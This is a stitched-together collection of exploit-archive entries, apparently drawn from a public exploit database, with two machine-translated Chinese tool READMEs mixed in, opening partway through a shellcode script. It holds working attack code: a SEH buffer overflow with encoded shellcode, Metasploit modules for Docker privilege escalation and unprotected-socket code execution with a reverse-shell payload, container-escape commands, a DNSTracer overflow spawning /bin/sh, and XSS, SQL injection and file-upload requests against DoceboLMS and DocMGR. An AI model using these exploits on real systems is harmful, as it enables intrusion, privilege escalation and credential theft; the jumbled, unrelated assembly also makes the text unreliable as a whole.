buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
exploit = "A"*3876
exploit += "\x74\x06\x75\x04"
# 0x1001062d - pop pop ret - reg.dll
exploit += "\x2d\x06\x01\x10"
exploit += egg
exploit += "D"*(10000-3884-len(egg)-len(buf)-8)
exploit += "T00WT00W"
exploit += buf
f = open("exploit.txt", "w")
f.write(exploit)
f.close()
source: https://www.securityfocus.com/bid/47861/info
DocMGR is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
DocMGR 1.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/docmgr/history.php?f=0%22%29;}alert%280%29;{//
Dockerspy在Docker Hub上搜索图像,并提取敏感信息,例如身份验证秘密,私钥等。
什么是docker?
Docker是一个开源平台,可自动使用容器化技术对应用程序进行部署,扩展和管理。容器允许开发人员将应用程序及其依赖项打包成一个可以在各种计算环境中始终运行的单个便携式单元。 Docker通过确保应用程序运行相同的方式来简化开发和部署过程,无论其部署何处。
关于Docker Hub
Docker Hub是一个基于云的存储库,开发人员可以在其中存储,共享和分布式容器图像。它是最大的容器图像库,可访问Docker和社区成员图像创建的官方图像。 Docker Hub使开发人员可以轻松找到,下载和部署预构建的图像,从而促进快速应用程序开发和部署。
Docker Hub上的
为什么在Docker Hub上的Osint?
开源智能(OSINT)涉及使用公开可用的信息来收集来自Docker Hub上托管的容器图像和存储库的洞察力和数据。这对于确定裸露的秘密的原因尤其重要:
安全审核:通过分析Docker图像,组织可以发现暴露的秘密,例如API密钥,身份验证令牌和可能被无意中包括的私钥。这有助于减轻潜在的安全风险。
预防事件预防:主动在Docker图像中搜索暴露的秘密可以防止安全漏洞在发生之前,保护敏感信息并保持应用程序的完整性。
合规性:确保容器图像不暴露秘密对于满足监管和组织安全标准是残酷的。 OSINT有助于验证没有无意间披露的敏感信息。
漏洞评估:将暴露的秘密确定为常规安全评估的一部分,使组织能够及时解决这些漏洞,从而降低了恶意行为者的剥削风险。
增强的安全姿势:不断监视Docker Hub以实现秘密,可以增强组织的整体安全姿势,从而使其对潜在威胁的抵抗力更具弹性。
利用Docker Hub上的OSINT查找暴露的秘密,使组织能够增强其安全措施,防止数据泄露,并确保敏感信息在其容器化应用程序中的信心。
Docker Hub Leak euth Secrets,私钥Docker Hub图像上的成千上万张图像发现可暴露秘密和私钥
dockerspy的工作原理
Dockerspy从Docker Hub获取信息,并使用正则表达式来检查内容是否敏感信息,例如秘密。
入门
要使用Dockerspy,请按照以下步骤:
安装:克隆Dockerspy存储库并安装所需的依赖项。 git clone https://github.com/undeadsec/dockerspy.git cd dockerspy使使用:从终端运行dockerspy。 Dockerspy
自定义配置
要自定义Dockerspy配置,编辑以下文件:-正则表达式- 忽略的文件扩展
免责声明
Dockerspy仅用于教育和研究目的。用户负责确保使用此工具符合适用的法律法规。
欢迎
贡献
对Dockerspy的捐款!请随时提交问题,功能请求或提取请求以帮助改善此工具。
关于作者
Dockerspy由Alisson Moretto(uteadsec)开发和维护
我是密码网络威胁情报专业人士,他喜欢分享见解和制作网络安全工具。
考虑遵循ME:
谢谢
特别感谢@akaclandestine
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Post::Windows::Priv
include Post::Windows::Runas
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',
'Description' => %q{
This exploit leverages a vulnerability in docker desktop
community editions prior to 2.1.0.1 where an attacker can write
a payload to a lower-privileged area to be executed
automatically by the docker user at login.
},
'License' => MSF_LICENSE,
'Author' => [
'Morgan Roman', # discovery
'bwatters-r7', # metasploit module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [[ 'Automatic', {} ]],
'DefaultTarget' => 0,
'DefaultOptions' => {
'WfsDelay' => 15
},
'DisclosureDate' => '2019-07-05',
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'References' => [
['CVE', '2019-15752'],
['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']
]
)
)
register_options(
[OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]
)
end
def docker_version
output = cmd_exec('cmd.exe', '/c docker -v')
vprint_status(output)
version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0]
Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))
end
def check
if docker_version <= Gem::Version.new('18.09.0')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end
# make payload
docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin")
fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)
payload_name = 'docker-credential-wincred.exe'
payload_pathname = "#{docker_path}\\#{payload_name}"
vprint_status('Making Payload')
payload = generate_payload_exe
# upload Payload
vprint_status("Uploading Payload to #{payload_pathname}")
write_file(payload_pathname, payload)
vprint_status('Payload Upload Complete')
print_status('Waiting for user to attempt to login')
end
def check_permissions!
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
# is_in_admin_group can be nil, true, or false
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Docker Daemon - Unprotected TCP Socket Exploit',
'Description' => %q{
Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
with tls but without tls-auth), an attacker can create a Docker
container with the '/' path mounted with read/write permissions on the
host server that is running the Docker container. As the Docker
container executes command as uid 0 it is honored by the host operating
system allowing the attacker to edit/create files owned by root. This
exploit abuses this to creates a cron job in the '/etc/cron.d/' path of
the host server.
The Docker image should exist on the target system or be a valid image
from hub.docker.com.
},
'Author' => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'],
['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket']
],
'DisclosureDate' => 'Jul 25, 2017',
'Targets' => [
[ 'Python', {
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Payload' => {
'Compat' => {
'ConnectionType' => 'reverse noconn none tunnel'
}
}
}]
],
'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' },
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(2375),
OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
OptString.new('CONTAINER_ID', [ false, 'container id you would like'])
]
)
end
def check_image(image_id)
vprint_status("Check if images exist on the target host")
res = send_request_raw(
'method' => 'GET',
'uri' => normalize_uri('images', 'json')
)
return unless res and res.code == 200 and res.body.include? image_id
res
end
def pull_image(image_id)
print_status("Trying to pulling image from docker registry, this may take a while")
res = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('images', 'create?fromImage=' + image_id)
)
return unless res.code == 200
res
end
def make_container_id
return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
rand_text_alpha_lower(8)
end
def make_cmd(mnt_path, cron_path, payload_path)
vprint_status('Creating the docker container command')
echo_cron_path = mnt_path + cron_path
echo_payload_path = mnt_path + payload_path
cron_command = "python #{payload_path}"
payload_data = payload.raw
command = "echo \"#{payload_data}\" >> #{echo_payload_path} && "
command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && "
command << "echo \"\" >> #{echo_cron_path} && "
command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}"
command
end
def make_container(mnt_path, cron_path, payload_path)
vprint_status('Setting container json request variables')
{
'Image' => datastore['DOCKERIMAGE'],
'Cmd' => make_cmd(mnt_path, cron_path, payload_path),
'Entrypoint' => %w[/bin/sh -c],
'HostConfig' => {
'Binds' => [
'/:' + mnt_path
]
}
}
end
def del_container(container_id)
send_request_raw(
{
'method' => 'DELETE',
'uri' => normalize_uri('containers', container_id)
},
1 # timeout
)
end
def check
res = send_request_raw(
'method' => 'GET',
'uri' => normalize_uri('containers', 'json'),
'headers' => { 'Accept' => 'application/json' }
)
if res.nil?
print_error('Failed to connect to the target')
return Exploit::CheckCode::Unknown
end
if res and res.code == 200 and res.headers['Server'].include? 'Docker'
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
# check if target is vulnerable
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::Unknown, 'Failed to connect to the target')
end
# check if image is not available, pull it or fail out
image_id = datastore['DOCKERIMAGE']
if check_image(image_id).nil?
fail_with(Failure::Unknown, 'Failed to pull the docker image') if pull_image(image_id).nil?
end
# create required information to create json container information.
cron_path = '/etc/cron.d/' + rand_text_alpha(8)
payload_path = '/tmp/' + rand_text_alpha(8)
mnt_path = '/mnt/' + rand_text_alpha(8)
container_id = make_container_id
# create container
res_create = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('containers', 'create?name=' + container_id),
'headers' => { 'Content-Type' => 'application/json' },
'data' => make_container(mnt_path, cron_path, payload_path).to_json
)
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201
print_status("The docker container is created, waiting for deploy")
register_files_for_cleanup(cron_path, payload_path)
# start container
send_request_raw(
{
'method' => 'POST',
'uri' => normalize_uri('containers', container_id, 'start')
},
1 # timeout
)
# wait until container stopped
vprint_status("Waiting until the docker container stopped")
res_wait = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('containers', container_id, 'wait'),
'headers' => { 'Accept' => 'application/json' }
)
# delete container
deleted_container = false
if res_wait.code == 200
vprint_status("The docker container has been stopped, now trying to remove it")
del_container(container_id)
deleted_container = true
end
# if container does not deploy, remove it and fail out
unless deleted_container
del_container(container_id)
fail_with(Failure::Unknown, "The docker container failed to deploy")
end
print_status('Waiting for the cron job to run, can take up to 60 seconds')
end
end
# Exploit Title: Docker Daemon - Unprotected TCP Socket
# Date: 20-07-2017
# Exploit Author: Martin Pizala
# Vendor Homepage: https://www.docker.com
# Software Link: https://www.docker.com/get-docker
# Version: Since 0.4.7 (2013-06-28) (feature: mount host directories)
# Tested on: Docker CE 17.06.0-ce and Docker Engine 1.13.1
1. Description
Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp with tls but without tls-auth), an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container and use chroot to escape the container-jail.
2. Proof of Concept
docker -H tcp://<ip>:<port> run --rm -ti -v /:/mnt alpine chroot /mnt /bin/sh
3. Solution:
Protect the tcp socket
https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket
https://docs.docker.com/engine/security/https/
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info, {
'Name' => 'Docker Daemon Privilege Escalation',
'Description' => %q{
This module obtains root privileges from any host account with access to the
Docker daemon. Usually this includes accounts in the `docker` group.
},
'License' => MSF_LICENSE,
'Author' => ['forzoni'],
'DisclosureDate' => 'Jun 28 2016',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X86_64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
'Targets' => [ ['Automatic', {}] ],
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 60 },
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0
}
))
register_advanced_options([
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
], self.class)
end
def check
if cmd_exec('docker ps && echo true') == 'true'
print_error("Failed to access Docker daemon.")
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Vulnerable
end
end
def exploit
pl = generate_payload_exe
exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
print_status("Writing payload executable to '#{exe_path}'")
write_file(exe_path, pl)
register_file_for_cleanup(exe_path)
print_status("Executing script to create and run docker container")
vprint_status cmd_exec("chmod +x #{exe_path}")
vprint_status shell_script(exe_path)
vprint_status cmd_exec("sh -c '#{shell_script(exe_path)}'")
print_status "Waiting #{datastore['WfsDelay']}s for payload"
end
def shell_script(exploit_path)
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
%Q{
IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"`
EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
docker rmi -f $IMG
#{exploit_path}
}.strip.split("\n").map(&:strip).join(';')
end
end
# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication
# Google Dork: [if applicable]
# Date: 06 March 2023
# Exploit Author: Shahid Parvez (zippon)
# Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability
# Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana
# Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3)
# Tested on: [Mac os]
# CVE : CVE-2023-27290
import argparse
import subprocess
import pexpect
# Define the available options and their corresponding commands
COMMANDS = {
"kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal",
"cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'",
"clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"',
"cockroach": "cockroach sql --host {host}:{port} --insecure",
"zookeeper": "echo dump |ncat {host} {port}",
"node-export": "curl http://{host}:{port}",
"elasticsearch": "curl http://{host}:{port}/_cat/indices?v",
"prometheus": "curl http://{host}:{port}/metrics",
"clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"'
}
# Define the parser for command-line arguments
parser = argparse.ArgumentParser(description="Script to run various commands on a host.")
parser.add_argument("host", help="The host IP address")
parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option")
parser.add_argument("--port", type=int, default=None, help="The port number (default: use default port for the selected option)")
parser.add_argument("--output", help="Output the result to a file")
parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed")
# Parse the command-line arguments
args = parser.parse_args()
# Determine the port number to use
if args.port is None:
if args.option == "cassandra":
port = "9042"
elif args.option == "clickhouse":
port = "8123"
elif args.option == "cockroach":
port = "26257"
elif args.option == "elasticsearch":
port = "9200"
elif args.option == "kafka":
port = "9092"
elif args.option == "node-export":
port = "8181"
elif args.option == "prometheus":
port = "9090"
elif args.option == "zookeeper":
port = "2181"
else:
port = str(args.port)
# Build the command to execute
command = COMMANDS[args.option].format(host=args.host, port=port)
# Print the command line if verbose option is provided
if args.verbose:
print(f"Executing command: {command}")
# If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shell
if args.option == "cassandra":
child = pexpect.spawn(command)
child.expect("Connected to.*", timeout=10)
child.interact()
output = child.before
elif args.option == "cockroach":
child = pexpect.spawn(command)
child.expect("root@.*:", timeout=10)
child.interact()
output = child.before
# If any other option is selected, execute the command and capture the output
else:
output = subprocess.check_output(command, shell=True)
# If an output file is provided, write the output to the file
if args.output:
with open(args.output, "wb") as f:
f.write(output)
# Print the output to the console
print(output.decode())
# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
DockF-Sec-Check有助于使您的Dockerfile命令更加安全。
完成
[X] Dockerfile
托多列表
中的第一级安全通知[]正确检测了Dockerfile。 [] Dockerfile中的二级安全通知。 [] Docker图像中的安全通知。 [] *****(私有存储库)
安装
来自源代码
您可以在安装前使用Virtualenv进行软件包依赖项。
git克隆https://github.com/osmankandemir/docf-sec-check.git
CD Docf-Sec-Check
python setup.py build
Python Setup.py安装
来自PYPI
该应用程序可在PYPI上找到。使用PIP:安装
PIP安装DocfSeccheck
来自Dockerfile
您可以在构建Dockerfile后在容器上运行此应用程序。您需要指定一条路径(您的本地路径)来扫描当地人中的码头。
Docker build -t docfseccheck。
Docker Run -V您的本地路径/dockerfile:/docf-sec-check/dockerfile docfseccheck -f/docf/docf-sec-check/dockerfile
来自Dockerhub
docker docker
docker run -v your局部路径/dockerfile:/docf-sec-check/dockerfile osmankandemir/docfseccheck:v1.0 -f/docf/docf/docf-sec-check/dockerfile 3
用法
-1010-dockerfile [dockerfile [dockerfile] Dockerfile路径。 - 文件dockerfile
功能用法
来自docfchecker import docfchecker
#dockerfile是您的文件路径。
DocFchecker(['Dockerfile'])
开发和贡献
请参阅;贡献.md
许可证
版权所有(C)2024 Osman Kandemir \ sufergpl-3.0许可。
捐赠
如果您喜欢Docf-Sec-Check,并且希望显示支持,则可以使用下面的按钮使用购买咖啡或GitHub赞助商功能。
或者
赞助商: https://github.com/sponsors/osmankandemir
您的支持将不胜感激
source: https://www.securityfocus.com/bid/47150/info
DoceboLMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
DoceboLMS 4.0.4 is vulnerable; other versions may also be affected.
<html>
<title>DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script>
<br /><br />
<form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=preassessment&op=modassessment" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" />
<input type="hidden" name="code" value='"><script>alert(1)</script>' />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="id_assess" value="0" />
<input type="hidden" name="name" value='"><script>alert(2)</script>' />
<input type="hidden" name="save" value="Save changes" /></form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit PreAssessment Module!</h3></center></font></b></a><br /><br />
<form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=news&op=savenews" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" />
<input type="hidden" name="language" value="2" />
<input type="hidden" name="long_desc" value="" />
<input type="hidden" name="news" value="Insert" />
<input type="hidden" name="short_desc" value="ZSL" />
<input type="hidden" name="title" value='"><script>alert(1)</script>' /></form>
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit News Module!</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/index.php?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #1</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #2</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/docebolms/index.php/index.php?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #3</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/docebolms/?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #4</h3></center></font></b></a><br /><br />
</body></html>
# Exploit Title: DoceboLMS 1.2 - SQL Injection
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.spaghettilearning.com/
# Software Link: https://datapacket.dl.sourceforge.net/project/spaghettilearn/Spaghettilearning%201.2%20Beta/Spaghettilearnin%201.2%20-%20Windows%20version/splearn12beta.exe
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/modules/progcourse/lesson.php?id=[SQL]&idC=[SQL]&idU=[SQL]
#
GET /[PATH]/modules/progcourse/lesson.php?id=%31%27%20%41%4e%44%20%45%4c%54%28%31%3d%31%2c%31%29%20%41%4e%44%20%27%45%66%65%27%3d%27%45%66%65 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: learning=fd935520ed5eafc7e53bffb101c8de6b
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 12 Nov 2018 15:28:22 GMT
Server: Apache/1.3.27 (Win32) PHP/4.3.3
X-Powered-By: PHP/4.3.3
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
# Exploit Title: DoceboLMS 1.2 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.spaghettilearning.com/
# Software Link: https://datapacket.dl.sourceforge.net/project/spaghettilearn/Spaghettilearning%201.2%20Beta/Spaghettilearnin%201.2%20-%20Windows%20version/splearn12beta.exe
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert
#
POST /[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: learning=ab3edb1f569003472985f03a29c58ff3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------25203287911319136191134967575
Content-Length: 394
-----------------------------25203287911319136191134967575
Content-Disposition: form-data; name="max_file_size"
10000000000
-----------------------------25203287911319136191134967575
Content-Disposition: form-data; name="uploadedfile"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------25203287911319136191134967575--
HTTP/1.1 200 OK
Date: Mon, 12 Nov 2018 16:03:33 GMT
Server: Apache/1.3.27 (Win32) PHP/4.3.3
X-Powered-By: PHP/4.3.3
Set-Cookie: learning=ab3edb1f569003472985f03a29c58ff3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
#
GET /[PATH]/fileCorsi/galleryImg/1542038613.user.phpinfo.php HTTP/1.1
Host: 192.168.245.133
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: /[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert
Cookie: learning=ab3edb1f569003472985f03a29c58ff3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 12 Nov 2018 16:03:43 GMT
Server: Apache/1.3.27 (Win32) PHP/4.3.3
X-Powered-By: PHP/4.3.3
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
# POC:
# 2)
# http://localhost/[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert
#
# http://localhost/[PATH]/fileCorsi/galleryImg/[FILE]
#
<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert">
<input name="max_file_size" value="10000000000" type="hidden">
<input name="uploadedfile" size="25" type="file">
<input value="_INS" type="submit">
</form>
</body>
</html>
# Exploit Title: DNSTracer 1.9 - Buffer Overflow
# Google Dork: [if applicable]
# Date: 03-08-2017
# Exploit Author: j0lama
# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php
# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz
# Version: 1.9
# Tested on: Ubuntu 12.04
# CVE : CVE-2017-9430
# Bug report: https://www.exploit-db.com/exploits/42115/
# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php
# Proof of Concept
import os
from subprocess import call
def run():
try:
print "\nDNSTracer Stack-based Buffer Overflow"
print "Author: j0lama"
print "Tested with Dnstracer compile without buffer overflow protection"
nops = "\x90"*1006
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
filling = "A"*24
eip = "\x2f\xeb\xff\xbf"
#buf size = 1057
buf = nops + shellcode + filling + eip
call(["./dnstracer", buf])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "\nDnstracer not found!\n"
else:
print "\nError executing exploit\n"
raise
if __name__ == '__main__':
try:
run()
except Exception as e:
print "Something went wrong"